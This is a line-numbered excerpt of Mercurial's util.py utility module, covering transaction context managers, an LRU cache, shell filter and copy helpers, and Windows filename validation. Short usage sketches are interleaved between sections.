731 953 if exc_type is None:
732 954 self.close()
733 955 finally:
734 956 self.release()
735 957
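A sketch of the contract with a hypothetical subclass: a clean exit from the with-block calls close() and then release(), while an exception skips close() so release() aborts.

```python
class demotransaction(transactional):
    def __init__(self):
        self.state = 'pending'
    def close(self):
        self.state = 'committed'
    def release(self):
        if self.state != 'committed':
            self.state = 'aborted'

with demotransaction() as tr:
    pass                        # no exception raised
assert tr.state == 'committed'
```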
736 958 @contextlib.contextmanager
737 959 def acceptintervention(tr=None):
738 960 """A context manager that closes the transaction on InterventionRequired
739 961
740 962 If no transaction was provided, this simply runs the body and returns
741 963 """
742 964 if not tr:
743 965 yield
744 966 return
745 967 try:
746 968 yield
747 969 tr.close()
748 970 except error.InterventionRequired:
749 971 tr.close()
750 972 raise
751 973 finally:
752 974 tr.release()
753 975
754 976 @contextlib.contextmanager
755 977 def nullcontextmanager():
756 978 yield
757 979
758 980 class _lrucachenode(object):
759 981 """A node in a doubly linked list.
760 982
761 983 Holds a reference to nodes on either side as well as a key-value
762 984 pair for the dictionary entry.
763 985 """
764 986 __slots__ = (u'next', u'prev', u'key', u'value')
765 987
766 988 def __init__(self):
767 989 self.next = None
768 990 self.prev = None
769 991
770 992 self.key = _notset
771 993 self.value = None
772 994
773 995 def markempty(self):
774 996 """Mark the node as emptied."""
775 997 self.key = _notset
776 998
777 999 class lrucachedict(object):
778 1000 """Dict that caches most recent accesses and sets.
779 1001
780 1002 The dict consists of an actual backing dict - indexed by original
781 1003 key - and a doubly linked circular list defining the order of entries in
782 1004 the cache.
783 1005
784 1006 The head node is the newest entry in the cache. If the cache is full,
785 1007 we recycle head.prev and make it the new head. Cache accesses result in
786 1008 the node being moved to before the existing head and being marked as the
787 1009 new head node.
788 1010 """
789 1011 def __init__(self, max):
790 1012 self._cache = {}
791 1013
792 1014 self._head = head = _lrucachenode()
793 1015 head.prev = head
794 1016 head.next = head
795 1017 self._size = 1
796 1018 self._capacity = max
797 1019
798 1020 def __len__(self):
799 1021 return len(self._cache)
800 1022
801 1023 def __contains__(self, k):
802 1024 return k in self._cache
803 1025
804 1026 def __iter__(self):
805 1027 # We don't have to iterate in cache order, but why not.
806 1028 n = self._head
807 1029 for i in range(len(self._cache)):
808 1030 yield n.key
809 1031 n = n.next
810 1032
811 1033 def __getitem__(self, k):
812 1034 node = self._cache[k]
813 1035 self._movetohead(node)
814 1036 return node.value
815 1037
816 1038 def __setitem__(self, k, v):
817 1039 node = self._cache.get(k)
818 1040 # Replace existing value and mark as newest.
819 1041 if node is not None:
820 1042 node.value = v
821 1043 self._movetohead(node)
822 1044 return
823 1045
824 1046 if self._size < self._capacity:
825 1047 node = self._addcapacity()
826 1048 else:
827 1049 # Grab the last/oldest item.
828 1050 node = self._head.prev
829 1051
830 1052 # At capacity. Kill the old entry.
831 1053 if node.key is not _notset:
832 1054 del self._cache[node.key]
833 1055
834 1056 node.key = k
835 1057 node.value = v
836 1058 self._cache[k] = node
837 1059 # And mark it as newest entry. No need to adjust order since it
838 1060 # is already self._head.prev.
839 1061 self._head = node
840 1062
841 1063 def __delitem__(self, k):
842 1064 node = self._cache.pop(k)
843 1065 node.markempty()
844 1066
845 1067 # Temporarily mark as newest item before re-adjusting head to make
846 1068 # this node the oldest item.
847 1069 self._movetohead(node)
848 1070 self._head = node.next
849 1071
850 1072 # Additional dict methods.
851 1073
852 1074 def get(self, k, default=None):
853 1075 try:
854 1076 return self._cache[k].value
855 1077 except KeyError:
856 1078 return default
857 1079
858 1080 def clear(self):
859 1081 n = self._head
860 1082 while n.key is not _notset:
861 1083 n.markempty()
862 1084 n = n.next
863 1085
864 1086 self._cache.clear()
865 1087
866 1088 def copy(self):
867 1089 result = lrucachedict(self._capacity)
868 1090 n = self._head.prev
869 1091 # Iterate in oldest-to-newest order, so the copy has the right ordering
870 1092 for i in range(len(self._cache)):
871 1093 result[n.key] = n.value
872 1094 n = n.prev
873 1095 return result
874 1096
875 1097 def _movetohead(self, node):
876 1098 """Mark a node as the newest, making it the new head.
877 1099
878 1100 When a node is accessed, it becomes the freshest entry in the LRU
879 1101 list, which is denoted by self._head.
880 1102
881 1103 Visually, let's make ``N`` the new head node (* denotes head):
882 1104
883 1105 previous/oldest <-> head <-> next/next newest
884 1106
885 1107 ----<->--- A* ---<->-----
886 1108 | |
887 1109 E <-> D <-> N <-> C <-> B
888 1110
889 1111 To:
890 1112
891 1113 ----<->--- N* ---<->-----
892 1114 | |
893 1115 E <-> D <-> C <-> B <-> A
894 1116
895 1117 This requires the following moves:
896 1118
897 1119 C.next = D (node.prev.next = node.next)
898 1120 D.prev = C (node.next.prev = node.prev)
899 1121 E.next = N (head.prev.next = node)
900 1122 N.prev = E (node.prev = head.prev)
901 1123 N.next = A (node.next = head)
902 1124 A.prev = N (head.prev = node)
903 1125 """
904 1126 head = self._head
905 1127 # C.next = D
906 1128 node.prev.next = node.next
907 1129 # D.prev = C
908 1130 node.next.prev = node.prev
909 1131 # N.prev = E
910 1132 node.prev = head.prev
911 1133 # N.next = A
912 1134 # It is tempting to do just "head" here, however if node is
913 1135 # adjacent to head, this will do bad things.
914 1136 node.next = head.prev.next
915 1137 # E.next = N
916 1138 node.next.prev = node
917 1139 # A.prev = N
918 1140 node.prev.next = node
919 1141
920 1142 self._head = node
921 1143
922 1144 def _addcapacity(self):
923 1145 """Add a node to the circular linked list.
924 1146
925 1147 The new node is inserted before the head node.
926 1148 """
927 1149 head = self._head
928 1150 node = _lrucachenode()
929 1151 head.prev.next = node
930 1152 node.prev = head.prev
931 1153 node.next = head
932 1154 head.prev = node
933 1155 self._size += 1
934 1156 return node
935 1157
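A behavior sketch (keys and values invented): accessing an entry refreshes it, so inserting into a full cache evicts the least recently used key.

```python
d = lrucachedict(2)
d['a'] = 1
d['b'] = 2
d['a']        # access moves 'a' to the head (newest)
d['c'] = 3    # at capacity: recycles the oldest node, evicting 'b'
assert 'a' in d and 'c' in d and 'b' not in d
```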
936 1158 def lrucachefunc(func):
937 1159 '''cache most recent results of function calls'''
938 1160 cache = {}
939 1161 order = collections.deque()
940 1162 if func.__code__.co_argcount == 1:
941 1163 def f(arg):
942 1164 if arg not in cache:
943 1165 if len(cache) > 20:
944 1166 del cache[order.popleft()]
945 1167 cache[arg] = func(arg)
946 1168 else:
947 1169 order.remove(arg)
948 1170 order.append(arg)
949 1171 return cache[arg]
950 1172 else:
951 1173 def f(*args):
952 1174 if args not in cache:
953 1175 if len(cache) > 20:
954 1176 del cache[order.popleft()]
955 1177 cache[args] = func(*args)
956 1178 else:
957 1179 order.remove(args)
958 1180 order.append(args)
959 1181 return cache[args]
960 1182
961 1183 return f
962 1184
963 1185 class propertycache(object):
964 1186 def __init__(self, func):
965 1187 self.func = func
966 1188 self.name = func.__name__
967 1189 def __get__(self, obj, type=None):
968 1190 result = self.func(obj)
969 1191 self.cachevalue(obj, result)
970 1192 return result
971 1193
972 1194 def cachevalue(self, obj, value):
973 1195 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
974 1196 obj.__dict__[self.name] = value
975 1197
976 1198 def clearcachedproperty(obj, prop):
977 1199 '''clear a cached property value, if one has been set'''
978 1200 if prop in obj.__dict__:
979 1201 del obj.__dict__[prop]
980 1202
981 1203 def pipefilter(s, cmd):
982 1204 '''filter string S through command CMD, returning its output'''
983 1205 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
984 1206 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
985 1207 pout, perr = p.communicate(s)
986 1208 return pout
987 1209
988 1210 def tempfilter(s, cmd):
989 1211 '''filter string S through a pair of temporary files with CMD.
990 1212 CMD is used as a template to create the real command to be run,
991 1213 with the strings INFILE and OUTFILE replaced by the real names of
992 1214 the temporary files generated.'''
993 1215 inname, outname = None, None
994 1216 try:
995 1217 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
996 1218 fp = os.fdopen(infd, pycompat.sysstr('wb'))
997 1219 fp.write(s)
998 1220 fp.close()
999 1221 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1000 1222 os.close(outfd)
1001 1223 cmd = cmd.replace('INFILE', inname)
1002 1224 cmd = cmd.replace('OUTFILE', outname)
1003 1225 code = os.system(cmd)
1004 1226 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1005 1227 code = 0
1006 1228 if code:
1007 1229 raise Abort(_("command '%s' failed: %s") %
1008 1230 (cmd, explainexit(code)))
1009 1231 return readfile(outname)
1010 1232 finally:
1011 1233 try:
1012 1234 if inname:
1013 1235 os.unlink(inname)
1014 1236 except OSError:
1015 1237 pass
1016 1238 try:
1017 1239 if outname:
1018 1240 os.unlink(outname)
1019 1241 except OSError:
1020 1242 pass
1021 1243
1022 1244 filtertable = {
1023 1245 'tempfile:': tempfilter,
1024 1246 'pipe:': pipefilter,
1025 1247 }
1026 1248
1027 1249 def filter(s, cmd):
1028 1250 "filter a string through a command that transforms its input to its output"
1029 1251 for name, fn in filtertable.iteritems():
1030 1252 if cmd.startswith(name):
1031 1253 return fn(s, cmd[len(name):].lstrip())
1032 1254 return pipefilter(s, cmd)
1033 1255
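An illustrative call, assuming a POSIX shell with `tr` available; the 'pipe:' prefix dispatches through filtertable to pipefilter:

```python
filter(b'mercurial', b'pipe: tr a-z A-Z')   # -> b'MERCURIAL'
```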
1034 1256 def binary(s):
1035 1257 """return true if a string is binary data"""
1036 1258 return bool(s and '\0' in s)
1037 1259
1038 1260 def increasingchunks(source, min=1024, max=65536):
1039 1261 '''return no less than min bytes per chunk while data remains,
1040 1262 doubling min after each chunk until it reaches max'''
1041 1263 def log2(x):
1042 1264 if not x:
1043 1265 return 0
1044 1266 i = 0
1045 1267 while x:
1046 1268 x >>= 1
1047 1269 i += 1
1048 1270 return i - 1
1049 1271
1050 1272 buf = []
1051 1273 blen = 0
1052 1274 for chunk in source:
1053 1275 buf.append(chunk)
1054 1276 blen += len(chunk)
1055 1277 if blen >= min:
1056 1278 if min < max:
1057 1279 min = min << 1
1058 1280 nmin = 1 << log2(blen)
1059 1281 if nmin > min:
1060 1282 min = nmin
1061 1283 if min > max:
1062 1284 min = max
1063 1285 yield ''.join(buf)
1064 1286 blen = 0
1065 1287 buf = []
1066 1288 if buf:
1067 1289 yield ''.join(buf)
1068 1290
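A behavior sketch of the doubling: twenty 500-byte chunks regroup into progressively larger chunks as min doubles toward max (the sizes were computed by hand for this input; note a yielded chunk may overshoot max by up to one source chunk).

```python
chunks = increasingchunks(iter([b'x' * 500] * 20), min=1024, max=4096)
sizes = [len(c) for c in chunks]
assert sizes == [1500, 2500, 4500, 1500]
```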
1069 1291 Abort = error.Abort
1070 1292
1071 1293 def always(fn):
1072 1294 return True
1073 1295
1074 1296 def never(fn):
1075 1297 return False
1076 1298
1077 1299 def nogc(func):
1078 1300 """disable garbage collector
1079 1301
1080 1302 Python's garbage collector triggers a GC each time a certain number of
1081 1303 container objects (the number being defined by gc.get_threshold()) are
1082 1304 allocated even when marked not to be tracked by the collector. Tracking has
1083 1305 no effect on when GCs are triggered, only on what objects the GC looks
1084 1306 into. As a workaround, disable GC while building complex (huge)
1085 1307 containers.
1086 1308
1087 1309 This garbage collector issue has been fixed in 2.7, but it still affects
1088 1310 CPython's performance.
1089 1311 """
1090 1312 def wrapper(*args, **kwargs):
1091 1313 gcenabled = gc.isenabled()
1092 1314 gc.disable()
1093 1315 try:
1094 1316 return func(*args, **kwargs)
1095 1317 finally:
1096 1318 if gcenabled:
1097 1319 gc.enable()
1098 1320 return wrapper
1099 1321
1100 1322 if pycompat.ispypy:
1101 1323 # PyPy runs slower with gc disabled
1102 1324 nogc = lambda x: x
1103 1325
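A usage sketch (the function is hypothetical): keep the collector disabled while building a large container.

```python
@nogc
def buildindex(entries):
    # Building a huge dict would otherwise trigger repeated GC passes.
    return dict((e, i) for i, e in enumerate(entries))
```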
1104 1326 def pathto(root, n1, n2):
1105 1327 '''return the relative path from one place to another.
1106 1328 root should use os.sep to separate directories
1107 1329 n1 should use os.sep to separate directories
1108 1330 n2 should use "/" to separate directories
1109 1331 returns an os.sep-separated path.
1110 1332
1111 1333 If n1 is a relative path, it's assumed it's
1112 1334 relative to root.
1113 1335 n2 should always be relative to root.
1114 1336 '''
1115 1337 if not n1:
1116 1338 return localpath(n2)
1117 1339 if os.path.isabs(n1):
1118 1340 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1119 1341 return os.path.join(root, localpath(n2))
1120 1342 n2 = '/'.join((pconvert(root), n2))
1121 1343 a, b = splitpath(n1), n2.split('/')
1122 1344 a.reverse()
1123 1345 b.reverse()
1124 1346 while a and b and a[-1] == b[-1]:
1125 1347 a.pop()
1126 1348 b.pop()
1127 1349 b.reverse()
1128 1350 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1129 1351
1130 1352 def mainfrozen():
1131 1353 """return True if we are a frozen executable.
1132 1354
1133 1355 The code supports py2exe (most common, Windows only) and tools/freeze
1134 1356 (portable, not much used).
1135 1357 """
1136 1358 return (safehasattr(sys, "frozen") or # new py2exe
1137 1359 safehasattr(sys, "importers") or # old py2exe
1138 1360 imp.is_frozen(u"__main__")) # tools/freeze
1139 1361
1140 1362 # the location of data files matching the source code
1141 1363 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1142 1364 # executable version (py2exe) doesn't support __file__
1143 1365 datapath = os.path.dirname(pycompat.sysexecutable)
1144 1366 else:
1145 1367 datapath = os.path.dirname(pycompat.fsencode(__file__))
1146 1368
1147 1369 i18n.setdatapath(datapath)
1148 1370
1149 1371 _hgexecutable = None
1150 1372
1151 1373 def hgexecutable():
1152 1374 """return location of the 'hg' executable.
1153 1375
1154 1376 Defaults to $HG or 'hg' in the search path.
1155 1377 """
1156 1378 if _hgexecutable is None:
1157 1379 hg = encoding.environ.get('HG')
1158 1380 mainmod = sys.modules[pycompat.sysstr('__main__')]
1159 1381 if hg:
1160 1382 _sethgexecutable(hg)
1161 1383 elif mainfrozen():
1162 1384 if getattr(sys, 'frozen', None) == 'macosx_app':
1163 1385 # Env variable set by py2app
1164 1386 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1165 1387 else:
1166 1388 _sethgexecutable(pycompat.sysexecutable)
1167 1389 elif (os.path.basename(
1168 1390 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1169 1391 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1170 1392 else:
1171 1393 exe = findexe('hg') or os.path.basename(sys.argv[0])
1172 1394 _sethgexecutable(exe)
1173 1395 return _hgexecutable
1174 1396
1175 1397 def _sethgexecutable(path):
1176 1398 """set location of the 'hg' executable"""
1177 1399 global _hgexecutable
1178 1400 _hgexecutable = path
1179 1401
1180 1402 def _isstdout(f):
1181 1403 fileno = getattr(f, 'fileno', None)
1182 1404 try:
1183 1405 return fileno and fileno() == sys.__stdout__.fileno()
1184 1406 except io.UnsupportedOperation:
1185 1407 return False # fileno() raised UnsupportedOperation
1186 1408
1187 1409 def shellenviron(environ=None):
1188 1410 """return environ with optional override, useful for shelling out"""
1189 1411 def py2shell(val):
1190 1412 'convert a python object into a string useful to the shell'
1191 1413 if val is None or val is False:
1192 1414 return '0'
1193 1415 if val is True:
1194 1416 return '1'
1195 1417 return pycompat.bytestr(val)
1196 1418 env = dict(encoding.environ)
1197 1419 if environ:
1198 1420 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1199 1421 env['HG'] = hgexecutable()
1200 1422 return env
1201 1423
1202 1424 def system(cmd, environ=None, cwd=None, out=None):
1203 1425 '''enhanced shell command execution.
1204 1426 run with environment maybe modified, maybe in different dir.
1205 1427
1206 1428 if out is specified, it is assumed to be a file-like object that has a
1207 1429 write() method. stdout and stderr will be redirected to out.'''
1208 1430 try:
1209 1431 stdout.flush()
1210 1432 except Exception:
1211 1433 pass
1212 1434 cmd = quotecommand(cmd)
1213 1435 env = shellenviron(environ)
1214 1436 if out is None or _isstdout(out):
1215 1437 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1216 1438 env=env, cwd=cwd)
1217 1439 else:
1218 1440 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1219 1441 env=env, cwd=cwd, stdout=subprocess.PIPE,
1220 1442 stderr=subprocess.STDOUT)
1221 1443 for line in iter(proc.stdout.readline, ''):
1222 1444 out.write(line)
1223 1445 proc.wait()
1224 1446 rc = proc.returncode
1225 1447 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1226 1448 rc = 0
1227 1449 return rc
1228 1450
1229 1451 def checksignature(func):
1230 1452 '''wrap a function with code to check for calling errors'''
1231 1453 def check(*args, **kwargs):
1232 1454 try:
1233 1455 return func(*args, **kwargs)
1234 1456 except TypeError:
1235 1457 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1236 1458 raise error.SignatureError
1237 1459 raise
1238 1460
1239 1461 return check
1240 1462
1241 1463 # a whitelist of known filesystems where hardlinks work reliably
1242 1464 _hardlinkfswhitelist = {
1243 1465 'btrfs',
1244 1466 'ext2',
1245 1467 'ext3',
1246 1468 'ext4',
1247 1469 'hfs',
1248 1470 'jfs',
1249 1471 'NTFS',
1250 1472 'reiserfs',
1251 1473 'tmpfs',
1252 1474 'ufs',
1253 1475 'xfs',
1254 1476 'zfs',
1255 1477 }
1256 1478
1257 1479 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1258 1480 '''copy a file, preserving mode and optionally other stat info like
1259 1481 atime/mtime
1260 1482
1261 1483 checkambig argument is used with filestat, and is useful only if
1262 1484 destination file is guarded by any lock (e.g. repo.lock or
1263 1485 repo.wlock).
1264 1486
1265 1487 copystat and checkambig should be exclusive.
1266 1488 '''
1267 1489 assert not (copystat and checkambig)
1268 1490 oldstat = None
1269 1491 if os.path.lexists(dest):
1270 1492 if checkambig:
1271 1493 oldstat = checkambig and filestat.frompath(dest)
1272 1494 unlink(dest)
1273 1495 if hardlink:
1274 1496 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1275 1497 # unless we are confident that dest is on a whitelisted filesystem.
1276 1498 try:
1277 1499 fstype = getfstype(os.path.dirname(dest))
1278 1500 except OSError:
1279 1501 fstype = None
1280 1502 if fstype not in _hardlinkfswhitelist:
1281 1503 hardlink = False
1282 1504 if hardlink:
1283 1505 try:
1284 1506 oslink(src, dest)
1285 1507 return
1286 1508 except (IOError, OSError):
1287 1509 pass # fall back to normal copy
1288 1510 if os.path.islink(src):
1289 1511 os.symlink(os.readlink(src), dest)
1290 1512 # copytime is ignored for symlinks, but in general copytime isn't needed
1291 1513 # for them anyway
1292 1514 else:
1293 1515 try:
1294 1516 shutil.copyfile(src, dest)
1295 1517 if copystat:
1296 1518 # copystat also copies mode
1297 1519 shutil.copystat(src, dest)
1298 1520 else:
1299 1521 shutil.copymode(src, dest)
1300 1522 if oldstat and oldstat.stat:
1301 1523 newstat = filestat.frompath(dest)
1302 1524 if newstat.isambig(oldstat):
1303 1525 # stat of copied file is ambiguous to original one
1304 1526 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1305 1527 os.utime(dest, (advanced, advanced))
1306 1528 except shutil.Error as inst:
1307 1529 raise Abort(str(inst))
1308 1530
1309 1531 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1310 1532 """Copy a directory tree using hardlinks if possible."""
1311 1533 num = 0
1312 1534
1313 1535 gettopic = lambda: hardlink and _('linking') or _('copying')
1314 1536
1315 1537 if os.path.isdir(src):
1316 1538 if hardlink is None:
1317 1539 hardlink = (os.stat(src).st_dev ==
1318 1540 os.stat(os.path.dirname(dst)).st_dev)
1319 1541 topic = gettopic()
1320 1542 os.mkdir(dst)
1321 1543 for name, kind in listdir(src):
1322 1544 srcname = os.path.join(src, name)
1323 1545 dstname = os.path.join(dst, name)
1324 1546 def nprog(t, pos):
1325 1547 if pos is not None:
1326 1548 return progress(t, pos + num)
1327 1549 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1328 1550 num += n
1329 1551 else:
1330 1552 if hardlink is None:
1331 1553 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1332 1554 os.stat(os.path.dirname(dst)).st_dev)
1333 1555 topic = gettopic()
1334 1556
1335 1557 if hardlink:
1336 1558 try:
1337 1559 oslink(src, dst)
1338 1560 except (IOError, OSError):
1339 1561 hardlink = False
1340 1562 shutil.copy(src, dst)
1341 1563 else:
1342 1564 shutil.copy(src, dst)
1343 1565 num += 1
1344 1566 progress(topic, num)
1345 1567 progress(topic, None)
1346 1568
1347 1569 return hardlink, num
1348 1570
1349 1571 _winreservednames = {
1350 1572 'con', 'prn', 'aux', 'nul',
1351 1573 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1352 1574 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1353 1575 }
1354 1576 _winreservedchars = ':*?"<>|'
1355 1577 def checkwinfilename(path):
1356 1578 r'''Check that the base-relative path is a valid filename on Windows.
1357 1579 Returns None if the path is ok, or a UI string describing the problem.
1358 1580
1359 1581 >>> checkwinfilename(b"just/a/normal/path")
1360 1582 >>> checkwinfilename(b"foo/bar/con.xml")
1361 1583 "filename contains 'con', which is reserved on Windows"
1362 1584 >>> checkwinfilename(b"foo/con.xml/bar")
1363 1585 "filename contains 'con', which is reserved on Windows"
1364 1586 >>> checkwinfilename(b"foo/bar/xml.con")
1365 1587 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1366 1588 "filename contains 'AUX', which is reserved on Windows"
1367 1589 >>> checkwinfilename(b"foo/bar/bla:.txt")
1368 1590 "filename contains ':', which is reserved on Windows"
1369 1591 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1370 1592 "filename contains '\\x07', which is invalid on Windows"
1371 1593 >>> checkwinfilename(b"foo/bar/bla ")
1372 1594 "filename ends with ' ', which is not allowed on Windows"
1373 1595 >>> checkwinfilename(b"../bar")
1374 1596 >>> checkwinfilename(b"foo\\")
1375 1597 "filename ends with '\\', which is invalid on Windows"
1376 1598 >>> checkwinfilename(b"foo\\/bar")
1377 1599 "directory name ends with '\\', which is invalid on Windows"
1378 1600 '''
1379 1601 if path.endswith('\\'):
1380 1602 return _("filename ends with '\\', which is invalid on Windows")
1381 1603 if '\\/' in path:
1382 1604 return _("directory name ends with '\\', which is invalid on Windows")
1383 1605 for n in path.replace('\\', '/').split('/'):
1384 1606 if not n:
1385 1607 continue
1386 1608 for c in _filenamebytestr(n):
1387 1609 if c in _winreservedchars:
1388 1610 return _("filename contains '%s', which is reserved "
1389 1611 "on Windows") % c
1390 1612 if ord(c) <= 31:
1391 1613 return _("filename contains '%s', which is invalid "
1392 1614 "on Windows") % escapestr(c)
1393 1615 base = n.split('.')[0]
1394 1616 if base and base.lower() in _winreservednames:
1395 1617 return _("filename contains '%s', which is reserved "
1396 1618 "on Windows") % base
1397 1619 t = n[-1:]
1398 1620 if t in '. ' and n not in '..':
1399 1621 return _("filename ends with '%s', which is not allowed "
1400 1622 "on Windows") % t
1401 1623
1402 1624 if pycompat.iswindows:
1403 1625 checkosfilename = checkwinfilename
1404 1626 timer = time.clock
1405 1627 else:
1406 1628 checkosfilename = platform.checkosfilename
1407 1629 timer = time.time
1408 1630
1409 1631 if safehasattr(time, "perf_counter"):
1410 1632 timer = time.perf_counter
1411 1633
1412 1634 def makelock(info, pathname):
1413 1635 try:
1414 1636 return os.symlink(info, pathname)
1415 1637 except OSError as why:
1416 1638 if why.errno == errno.EEXIST:
1417 1639 raise
1418 1640 except AttributeError: # no symlink in os
1419 1641 pass
1420 1642
1421 1643 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1422 1644 os.write(ld, info)
1423 1645 os.close(ld)
1424 1646
1425 1647 def readlock(pathname):
1426 1648 try:
1427 1649 return os.readlink(pathname)
1428 1650 except OSError as why:
1429 1651 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1430 1652 raise
1431 1653 except AttributeError: # no symlink in os
1432 1654 pass
1433 1655 fp = posixfile(pathname)
1434 1656 r = fp.read()
1435 1657 fp.close()
1436 1658 return r
1437 1659
1438 1660 def fstat(fp):
1439 1661 '''stat file object that may not have fileno method.'''
1440 1662 try:
1441 1663 return os.fstat(fp.fileno())
1442 1664 except AttributeError:
1443 1665 return os.stat(fp.name)
1444 1666
1445 1667 # File system features
1446 1668
1447 1669 def fscasesensitive(path):
1448 1670 """
1449 1671 Return true if the given path is on a case-sensitive filesystem
1450 1672
1451 1673 Requires a path (like /foo/.hg) ending with a foldable final
1452 1674 directory component.
1453 1675 """
1454 1676 s1 = os.lstat(path)
1455 1677 d, b = os.path.split(path)
1456 1678 b2 = b.upper()
1457 1679 if b == b2:
1458 1680 b2 = b.lower()
1459 1681 if b == b2:
1460 1682 return True # no evidence against case sensitivity
1461 1683 p2 = os.path.join(d, b2)
1462 1684 try:
1463 1685 s2 = os.lstat(p2)
1464 1686 if s2 == s1:
1465 1687 return False
1466 1688 return True
1467 1689 except OSError:
1468 1690 return True
1469 1691
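An illustrative probe; '.hg' has a distinct upper-case spelling, so it satisfies the "foldable final component" requirement above (the path and results are typical examples, not guaranteed):

```python
fscasesensitive(b'/path/to/repo/.hg')  # typically True on ext4,
                                       # False on case-insensitive HFS+
```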
1470 1692 try:
1471 1693 import re2
1472 1694 _re2 = None
1473 1695 except ImportError:
1474 1696 _re2 = False
1475 1697
1476 1698 class _re(object):
1477 1699 def _checkre2(self):
1478 1700 global _re2
1479 1701 try:
1480 1702 # check if match works, see issue3964
1481 1703 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1482 1704 except ImportError:
1483 1705 _re2 = False
1484 1706
1485 1707 def compile(self, pat, flags=0):
1486 1708 '''Compile a regular expression, using re2 if possible
1487 1709
1488 1710 For best performance, use only re2-compatible regexp features. The
1489 1711 only flags from the re module that are re2-compatible are
1490 1712 IGNORECASE and MULTILINE.'''
1491 1713 if _re2 is None:
1492 1714 self._checkre2()
1493 1715 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1494 1716 if flags & remod.IGNORECASE:
1495 1717 pat = '(?i)' + pat
1496 1718 if flags & remod.MULTILINE:
1497 1719 pat = '(?m)' + pat
1498 1720 try:
1499 1721 return re2.compile(pat)
1500 1722 except re2.error:
1501 1723 pass
1502 1724 return remod.compile(pat, flags)
1503 1725
1504 1726 @propertycache
1505 1727 def escape(self):
1506 1728 '''Return the version of escape corresponding to self.compile.
1507 1729
1508 1730 This is imperfect because whether re2 or re is used for a particular
1509 1731 function depends on the flags, etc, but it's the best we can do.
1510 1732 '''
1511 1733 global _re2
1512 1734 if _re2 is None:
1513 1735 self._checkre2()
1514 1736 if _re2:
1515 1737 return re2.escape
1516 1738 else:
1517 1739 return remod.escape
1518 1740
1519 1741 re = _re()
1520 1742
1521 1743 _fspathcache = {}
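An illustrative call through the module-level `re` instance: it transparently compiles with re2 when available and falls back to the stdlib engine (imported here as remod).

```python
pat = re.compile(br'\[([^\[]+)\]', remod.IGNORECASE)
m = pat.match(b'[ui]')
assert m.group(1) == b'ui'
```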
1522 1744 def fspath(name, root):
1523 1745 '''Get name in the case stored in the filesystem
1524 1746
1525 1747 The name should be relative to root, and be normcase-ed for efficiency.
1526 1748
1527 1749 Note that this function is unnecessary, and should not be
1528 1750 called, for case-sensitive filesystems (simply because it's expensive).
1529 1751
1530 1752 The root should be normcase-ed, too.
1531 1753 '''
1532 1754 def _makefspathcacheentry(dir):
1533 1755 return dict((normcase(n), n) for n in os.listdir(dir))
1534 1756
1535 1757 seps = pycompat.ossep
1536 1758 if pycompat.osaltsep:
1537 1759 seps = seps + pycompat.osaltsep
1538 1760 # Protect backslashes. This gets silly very quickly.
1539 1761 seps = seps.replace('\\', '\\\\')
1540 1762 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1541 1763 dir = os.path.normpath(root)
1542 1764 result = []
1543 1765 for part, sep in pattern.findall(name):
1544 1766 if sep:
1545 1767 result.append(sep)
1546 1768 continue
1547 1769
1548 1770 if dir not in _fspathcache:
1549 1771 _fspathcache[dir] = _makefspathcacheentry(dir)
1550 1772 contents = _fspathcache[dir]
1551 1773
1552 1774 found = contents.get(part)
1553 1775 if not found:
1554 1776 # retry "once per directory" per "dirstate.walk" which
1555 1777 # may take place for each patch of "hg qpush", for example
1556 1778 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1557 1779 found = contents.get(part)
1558 1780
1559 1781 result.append(found or part)
1560 1782 dir = os.path.join(dir, part)
1561 1783
1562 1784 return ''.join(result)
1563 1785
1564 1786 def checknlink(testfile):
1565 1787 '''check whether hardlink count reporting works properly'''
1566 1788
1567 1789 # testfile may be open, so we need a separate file for checking to
1568 1790 # work around issue2543 (or testfile may get lost on Samba shares)
1569 1791 f1, f2, fp = None, None, None
1570 1792 try:
1571 1793 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1572 1794 suffix='1~', dir=os.path.dirname(testfile))
1573 1795 os.close(fd)
1574 1796 f2 = '%s2~' % f1[:-2]
1575 1797
1576 1798 oslink(f1, f2)
1577 1799 # nlinks() may behave differently for files on Windows shares if
1578 1800 # the file is open.
1579 1801 fp = posixfile(f2)
1580 1802 return nlinks(f2) > 1
1581 1803 except OSError:
1582 1804 return False
1583 1805 finally:
1584 1806 if fp is not None:
1585 1807 fp.close()
1586 1808 for f in (f1, f2):
1587 1809 try:
1588 1810 if f is not None:
1589 1811 os.unlink(f)
1590 1812 except OSError:
1591 1813 pass
1592 1814
1593 1815 def endswithsep(path):
1594 1816 '''Check path ends with os.sep or os.altsep.'''
1595 1817 return (path.endswith(pycompat.ossep)
